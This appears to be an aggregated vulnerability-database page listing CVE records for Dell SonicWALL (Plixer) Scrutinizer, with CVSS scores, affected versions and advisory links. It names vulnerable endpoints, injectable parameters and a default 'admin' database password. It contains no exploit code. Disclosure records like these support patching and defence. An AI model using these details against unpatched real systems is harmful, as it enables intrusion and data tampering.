Vulnerabilites related to sonicwall - scrutinizer
Vulnerability from fkie_nvd
Published
2012-07-31 10:45
Modified
2025-04-11 00:51
Severity ?
Summary
The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Third Party Advisory | |
| cve@mitre.org | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7B289171-C4A1-4221-9B31-253ED41FA4EB",
"versionEndIncluding": "9.0.1.19899",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "The MySQL component in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) 9.0.1.19899 and earlier has a default password of admin for the (1) scrutinizer and (2) scrutremote accounts, which allows remote attackers to execute arbitrary SQL commands via a TCP session."
},
{
"lang": "es",
"value": "El componente MySQL en Plixer Scrutinizer (tambi\u00e9n conocido como Dell SonicWALL Scrutinizer) v9.0.1.19899 y anteiores tiene una contrase\u00f1a por defecto para el admin en (1) scrutinizer y (2) cuentas scrutremote, lo que permite a atacantes remotos ejecutar comandos SQL a trav\u00e9s de una sesi\u00f3n TCP."
}
],
"id": "CVE-2012-3951",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-07-31T10:45:42.763",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-07-16 14:19
Modified
2025-04-12 10:46
Severity ?
Summary
Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | 11.0.1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:11.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D86266F1-E660-43A6-B451-2106915ED9EA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Dell SonicWall Scrutinizer 11.0.1 allows remote authenticated users to change user passwords via the user ID in the savePrefs parameter in a change password request to cgi-bin/admin.cgi."
},
{
"lang": "es",
"value": "SonicWall Scrutinizer versi\u00f3n 11.0.1 de Dell, permite a los usuarios autenticados remotos cambiar contrase\u00f1as de usuario por medio del ID de usuario en el par\u00e1metro savePrefs en una petici\u00f3n de cambio de contrase\u00f1a en el archivo cgi-bin/admin.cgi."
}
],
"id": "CVE-2014-4976",
"lastModified": "2025-04-12T10:46:40.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-07-16T14:19:04.323",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94438"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-264"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2014-07-16 14:19
Modified
2025-04-12 10:46
Severity ?
Summary
Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | 11.0.1 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:11.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "D86266F1-E660-43A6-B451-2106915ED9EA",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in Dell SonicWall Scrutinizer 11.0.1 allow remote authenticated users to execute arbitrary SQL commands via the (1) selectedUserGroup parameter in a create new user request to cgi-bin/admin.cgi or the (2) user_id parameter in the changeUnit function, (3) methodDetail parameter in the methodDetail function, or (4) xcNetworkDetail parameter in the xcNetworkDetail function in d4d/exporters.php."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en Dell SonicWall Scrutinizer 11.0.1 permiten a usuarios remotos autenticados ejecutar comandos SQL arbitrarios a trav\u00e9s del (1) par\u00e1metro selectedUserGroup en una solicitud de crear un usuario nuevo en cgi-bin/admin.cgi o el (2) par\u00e1metro user_id en la funci\u00f3n changeUnit, (3) par\u00e1metro methodDetail en la funci\u00f3n methodDetail o (4) par\u00e1metro xcNetworkDetail en la funci\u00f3n xcNetworkDetail en d4d/exporters.php."
}
],
"id": "CVE-2014-4977",
"lastModified": "2025-04-12T10:46:40.837",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2014-07-16T14:19:04.370",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/39836/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/127429/Dell-Sonicwall-Scrutinizer-11.01-Code-Execution-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://packetstormsecurity.com/files/137098/Dell-SonicWALL-Scrutinizer-11.01-methodDetail-SQL-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://seclists.org/fulldisclosure/2014/Jul/44"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/68495"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/94439"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/36b4b8df1cde279a9305"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://www.exploit-db.com/exploits/39836/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-07-31 10:45
Modified
2025-04-11 00:51
Severity ?
Summary
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Broken Link, Third Party Advisory | |
| cve@mitre.org | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Broken Link, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9D86CE5-6432-40AB-B46A-6FF8963944FC",
"versionEndExcluding": "9.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action."
},
{
"lang": "es",
"value": "cgi-bin/admin.cgi en la consola web Plixer Scrutinizer (tambi\u00e9n conocido como Dell SonicWALL Scrutinizer) anterior a v9.5.0 no requiere la autenticaci\u00f3n de token, lo que permite a atacantes remotos agregar las cuentas administrativas a trav\u00e9s de una acci\u00f3n userprefs."
}
],
"id": "CVE-2012-2626",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-07-31T10:45:41.357",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-07-31 10:45
Modified
2025-04-11 00:51
Severity ?
Summary
Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Broken Link, Third Party Advisory | |
| cve@mitre.org | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html | Broken Link, Third Party Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt | Exploit, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9D86CE5-6432-40AB-B46A-6FF8963944FC",
"versionEndExcluding": "9.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple cross-site scripting (XSS) vulnerabilities in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to d4d/exporters.php, (2) the HTTP Referer header to d4d/exporters.php, or (3) unspecified input to d4d/contextMenu.php."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de ejecuci\u00f3n de secuencias de comandos en sitios cruzados (XSS) en la consola web en Plixer Scrutinizer (tambi\u00e9n conocido como Dell SonicWALL Scrutinizer), permite a atacantes remotos inyectar secuencias de comandos web o HTML a trav\u00e9s de (1) la cadena de petici\u00f3n sobre d4d/exporters.php, (2) la cabecera HTTP Referer sobre d4d/exporters.php, o (3) entrada no especificada sobre d4d/contextMenu.php."
}
],
"id": "CVE-2012-3848",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2012-07-31T10:45:42.717",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-79"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-07-30 22:55
Modified
2025-04-11 00:51
Severity ?
Summary
SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B02550D6-CFDB-456F-8FF2-3E618D2D9219",
"versionEndExcluding": "9.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter."
},
{
"lang": "es",
"value": "Vulnerabilidad de inyecci\u00f3n de secuencias de comandos en d4d/statusFilter.php en Plixer Scrutinizer (tambi\u00e9n conocido como Dell SonicWALL Scrutinizer) anterior a v9.5.2 permite a usuarios remotos autenticados ejecutar comandos SQL a trav\u00e9s del par\u00e1metro q."
}
],
"id": "CVE-2012-2962",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-07-30T22:55:03.020",
"references": [
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/50052"
},
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"source": "cret@cert.org",
"tags": [
"Broken Link"
],
"url": "http://www.osvdb.org/84232"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "cret@cert.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/54625"
},
{
"source": "cret@cert.org",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
},
{
"source": "cret@cert.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://secunia.com/advisories/50052"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/20033"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/404051"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://www.osvdb.org/84232"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/54625"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link",
"Vendor Advisory"
],
"url": "http://www.sonicwall.com/shared/download/Dell_SonicWALL_Scrutinizer_Service_Bulletin_for_SQL_injection_vulnerability_CVE.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/77148"
}
],
"sourceIdentifier": "cret@cert.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2012-07-31 10:45
Modified
2025-04-11 00:51
Severity ?
Summary
d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\Scrutinizer\snmp\mibs\ via a multipart/form-data POST request.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sonicwall | scrutinizer | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sonicwall:scrutinizer:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9D86CE5-6432-40AB-B46A-6FF8963944FC",
"versionEndExcluding": "9.5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "d4d/uploader.php in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 allows remote attackers to create or overwrite arbitrary files in %PROGRAMFILES%\\Scrutinizer\\snmp\\mibs\\ via a multipart/form-data POST request."
},
{
"lang": "es",
"value": "d4d/uploader.php en la consola web Plixer Scrutinizer (tambi\u00e9n conocido como Dell SonicWALL Scrutinizer) anterior a v9.5.0 permite a atacantes remotos crear o sobreescribir archivos arbitrarios en %PROGRAMFILES%\\Scrutinizer\\snmp\\mibs\\ a trav\u00e9s de una solicitud POST multipart/form-data"
}
],
"id": "CVE-2012-2627",
"lastModified": "2025-04-11T00:51:21.963",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.4,
"confidentialityImpact": "NONE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 9.2,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2012-07-31T10:45:41.450",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://www.plixer.com/Press-Releases/plixer-releases-9-5-2.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
var-201207-0237
Vulnerability from variot
SQL injection vulnerability in d4d/statusFilter.php in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.2 allows remote authenticated users to execute arbitrary SQL commands via the q parameter. Dell SonicWALL Scrutinizer 9.5.0 and older versions contain a SQL injection vulnerability. Dell SonicWALL Scrutinizer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Dell SonicWALL Scrutinizer 9.0.1 is vulnerable; other versions may also be affected. Dell SonicWALL Scrutinizer is a set of multi-vendor application communication analysis visualization and reporting tools developed by Dell. The tool provides features such as deep packet analysis, vibration/latency monitoring, and historical and proactive reporting. 